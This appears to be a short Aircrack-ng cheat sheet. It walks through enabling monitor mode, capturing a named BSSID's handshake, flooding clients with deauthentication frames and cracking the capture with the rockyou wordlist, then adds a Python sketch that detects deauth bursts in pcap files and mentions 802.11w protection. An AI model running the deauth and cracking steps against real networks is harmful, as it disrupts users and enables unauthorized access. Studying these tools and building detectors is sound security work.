
Aircrack-ng

Aircrack-ng is a network software suite consisting of a detector, packet sniffer, WEP and WPA/WPA2-PSK cracker and analysis tool for 802.11 wireless LANs. It works with any wireless network interface controller whose driver supports raw monitoring mode and can sniff 802.11a, 802.11b and 802.11g traffic.

Capturing wireless handshakes

Commonly used Aircrack-ng tools and commands to capture a wireless handshake

Airmon-ng

Enable and disable monitor mode on wireless interfaces

  1. Kill active processes that could interfere with monitor mode
sudo airmon-ng check kill
  2. Put wireless card into monitor mode
sudo airmon-ng start wlan0
  3. Turn off monitor mode
sudo airmon-ng stop wlan0mon

Airodump-ng

Capture raw 802.11 frames

  1. Scan for wireless networks
sudo airodump-ng wlan0mon
  • Press Ctrl+C to stop
  • Save MAC address, channel, name, etc...
  2. Filter to display target network
sudo airodump-ng wlan0mon -d <MAC_Address>
  3. Receive and store captures
sudo airodump-ng -w filename -c 2 --bssid 00:11:AB:CD:E5:F8 wlan0mon

Aireplay-ng

Inject and replay wireless frames

** Open a new terminal for the following command **

  1. Send deauthentication frames to the target network's clients
sudo aireplay-ng --deauth 0 -a 00:11:AB:CD:E5:F8 wlan0mon
  2. Try a simple crack
aircrack-ng filename-01.cap -w /usr/share/wordlists/rockyou.txt
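
Detecting the deauthentication burst (added example, not part of the original notes or of the Aircrack-ng project): the aireplay-ng step above shows up in a monitor-mode capture as a run of deauthentication frames tied to one BSSID, and this sketch counts them per BSSID in a sliding time window. The function names, the threshold of 10 frames per second and the sample capture are assumptions constructed for illustration.

```python
import struct
from collections import defaultdict

DEAUTH, DISASSOC = 0xC0, 0xA0   # frame-control byte 0 for management subtypes 12 and 10

def read_pcap(data):
    """Yield (timestamp, 802.11 frame) from a little-endian pcap (link type 105 or 127)."""
    magic, *_, linktype = struct.unpack_from("<IHHiIII", data, 0)
    if magic != 0xA1B2C3D4 or linktype not in (105, 127):
        raise ValueError("need a little-endian pcap of raw 802.11 or radiotap frames")
    off = 24
    while off + 16 <= len(data):
        sec, usec, caplen, _ = struct.unpack_from("<IIII", data, off)
        pkt = data[off + 16:off + 16 + caplen]
        off += 16 + caplen
        if linktype == 127 and len(pkt) >= 4:     # radiotap header length is at bytes 2-3
            pkt = pkt[struct.unpack_from("<H", pkt, 2)[0]:]
        yield sec + usec / 1e6, pkt

def deauth_bursts(data, threshold=10, window=1.0):
    """Map BSSID -> peak deauth/disassoc count inside any `window` seconds, if >= threshold."""
    seen = defaultdict(list)
    for ts, f in read_pcap(data):
        if len(f) >= 24 and f[0] in (DEAUTH, DISASSOC):
            seen[f[16:22].hex(":")].append(ts)    # address 3 carries the BSSID
    alerts = {}
    for bssid, ts in seen.items():
        ts.sort()
        lo = peak = 0
        for hi in range(len(ts)):
            while ts[hi] - ts[lo] > window:       # shrink window from the left
                lo += 1
            peak = max(peak, hi - lo + 1)
        if peak >= threshold:
            alerts[bssid] = peak
    return alerts

def sample_capture():
    """Constructed capture: one beacon, a 64-frame broadcast deauth burst, two spaced deauths."""
    def rec(sec, usec, fc0, bssid):
        frame = bytes([fc0, 0, 0, 0]) + b"\xff" * 6 + bssid * 2 + b"\x00\x00\x07\x00"
        return struct.pack("<IIII", sec, usec, len(frame), len(frame)) + frame
    ap = bytes.fromhex("0011abcde5f8")            # BSSID used in the commands above
    other = bytes.fromhex("020000000001")         # constructed second BSSID
    out = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, 105)
    out += rec(0, 0, 0x80, ap)
    out += b"".join(rec(5, i * 5000, DEAUTH, ap) for i in range(64))
    out += rec(10, 0, DEAUTH, other) + rec(40, 0, DEAUTH, other)
    return out
```

Calling deauth_bursts(sample_capture()) flags only the BSSID that received the burst. Where the access point and clients support 802.11w Protected Management Frames, enabling it makes clients discard forged deauthentication frames.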
